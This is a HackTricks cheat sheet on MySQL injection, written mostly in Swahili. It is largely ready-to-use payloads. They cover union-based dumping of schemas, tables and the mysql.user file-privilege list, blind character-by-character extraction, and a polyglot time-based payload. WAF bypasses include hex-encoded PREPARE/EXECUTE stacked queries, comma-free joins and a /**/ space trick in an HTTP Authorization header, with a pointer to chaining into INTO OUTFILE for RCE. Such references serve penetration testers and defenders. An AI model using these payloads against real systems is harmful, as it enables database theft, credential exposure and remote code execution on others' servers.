HackTricksMySQL injection
Reading time: 7 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Maoni
-- MYSQL Comment
# MYSQL Comment
/* MYSQL Comment */
/*! MYSQL Special SQL */
/*!32302 10*/ Comment for MySQL version 3.23.02
Interesting Functions
Confirm Mysql:
concat('a','b')
database()
version()
user()
system_user()
@@version
@@datadir
rand()
floor(2.9)
length(1)
count(1)
Kazi za manufaa
SELECT hex(database())
SELECT conv(hex(database()),16,10) # Hexadecimal -> Decimal
SELECT DECODE(ENCODE('cleartext', 'PWD'), 'PWD')# Encode() & decpde() returns only numbers
SELECT uncompress(compress(database())) #Compress & uncompress() returns only numbers
SELECT replace(database(),"r","R")
SELECT substr(database(),1,1)='r'
SELECT substring(database(),1,1)=0x72
SELECT ascii(substring(database(),1,1))=114
SELECT database()=char(114,101,120,116,101,115,116,101,114)
SELECT group_concat(<COLUMN>) FROM <TABLE>
SELECT group_concat(if(strcmp(table_schema,database()),table_name,null))
SELECT group_concat(CASE(table_schema)When(database())Then(table_name)END)
strcmp(),mid(),,ldap(),rdap(),left(),rigth(),instr(),sleep()
Mchoro wote
SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"
from https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/
Mchakato
Kumbuka kwamba katika toleo za "kisasa" za MySQL unaweza kubadilisha "information_schema.tables" kwa "mysql.innodb_table_stats" (Hii inaweza kuwa na manufaa kupita WAFs).
SELECT table_name FROM information_schema.tables WHERE table_schema=database();#Get name of the tables
SELECT column_name FROM information_schema.columns WHERE table_name="<TABLE_NAME>"; #Get name of the columns of the table
SELECT <COLUMN1>,<COLUMN2> FROM <TABLE_NAME>; #Get values
SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges
Thamani 1 tu
group_concat()Limit X,1
Kipofu mmoja mmoja
substr(version(),X,1)='r'ausubstring(version(),X,1)=0x70auascii(substr(version(),X,1))=112mid(version(),X,1)='5'
Kipofu kuongeza
LPAD(version(),1...lenght(version()),'1')='asd'...RPAD(version(),1...lenght(version()),'1')='asd'...SELECT RIGHT(version(),1...lenght(version()))='asd'...SELECT LEFT(version(),1...lenght(version()))='asd'...SELECT INSTR('foobarbar', 'fo...')=1
Gundua idadi ya safu
Kutumia ODER rahisi
order by 1
order by 2
order by 3
...
order by XXX
UniOn SeLect 1
UniOn SeLect 1,2
UniOn SeLect 1,2,3
...
MySQL Union Based
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
SSRF
Jifunze hapa chaguzi tofauti za kudhulumu Mysql injection ili kupata SSRF.
Njia za kupita WAF
Kutekeleza maswali kupitia Prepared Statements
Wakati maswali yaliyo stacked yanaruhusiwa, inaweza kuwa inawezekana kupita WAFs kwa kupewa thamani ya hex ya swali unalotaka kutekeleza (kwa kutumia SET), na kisha kutumia PREPARE na EXECUTE MySQL statements ili hatimaye kutekeleza swali hilo. Kitu kama hiki:
0); SET @query = 0x53454c45435420534c454550283129; PREPARE stmt FROM @query; EXECUTE stmt; #
Kwa maelezo zaidi tafadhali rejelea hii blogu.
Mbadala wa information_schema
Kumbuka kwamba katika toleo la "kisasa" la MySQL unaweza kubadilisha information_schema.tables kwa mysql.innodb_table_stats au kwa sys.x$schema_flattened_keys au kwa sys.schema_table_statistics
MySQLinjection bila KOMAA
Chagua safu 2 bila kutumia koma yoyote (https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma):
-1' union select * from (select 1)UT1 JOIN (SELECT table_name FROM mysql.innodb_table_stats)UT2 on 1=1#
Kupata thamani bila jina la safu
Ikiwa wakati fulani unajua jina la jedwali lakini hujui majina ya safu ndani ya jedwali, unaweza kujaribu kupata ni safu ngapi zipo kwa kutekeleza kitu kama:
# When a True is returned, you have found the number of columns
select (select "", "") = (SELECT * from demo limit 1); # 2columns
select (select "", "", "") < (SELECT * from demo limit 1); # 3columns
Kukisia kuna safu 2 (safu ya kwanza ikiwa ni ID) na nyingine ikiwa ni bendera, unaweza kujaribu kubruteforce maudhui ya bendera ukijaribu herufi moja moja:
# When True, you found the correct char and can start ruteforcing the next position
select (select 1, 'flaf') = (SELECT * from demo limit 1);
More info in https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952
Injection bila SPACES (/**/ comment trick)
Baadhi ya programu zinaondoa au kuchambua pembejeo za mtumiaji kwa kutumia kazi kama sscanf("%128s", buf) ambayo inasimama kwenye herufi ya kwanza ya nafasi.
Kwa sababu MySQL inachukulia mfuatano /**/ kama maoni na kama nafasi, inaweza kutumika kuondoa kabisa nafasi za kawaida kutoka kwenye payload huku ikihifadhi ombi kuwa sahihi kisarufi.
Mfano wa injection ya kipofu ya muda inayopita chujio cha nafasi:
GET /api/fabric/device/status HTTP/1.1
Authorization: Bearer AAAAAA'/**/OR/**/SLEEP(5)--/**/-'
Ambayo hifadhidata inapata kama:
' OR SLEEP(5)-- -'
Hii ni muhimu hasa wakati:
- Buffer inayoweza kudhibitiwa ina mipaka ya ukubwa (kwa mfano,
%128s) na nafasi zingeweza kumaliza ingizo mapema. - Kuingiza kupitia vichwa vya HTTP au maeneo mengine ambapo nafasi za kawaida zinatolewa au kutumika kama wapatanishi.
- Imeunganishwa na
INTO OUTFILEprimitives ili kufikia RCE kamili kabla ya uthibitisho (angalia sehemu ya MySQL File RCE).
Historia ya MySQL
Unaweza kuona utekelezaji mwingine ndani ya MySQL ukisoma jedwali: sys.x$statement_analysis
Mbadala wa toleos
mysql> select @@innodb_version;
mysql> select @@version;
mysql> select version();
Miongozo Mingine ya MYSQL Injection
Marejeleo
- PayloadsAllTheThings – MySQL Injection cheatsheet
- Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.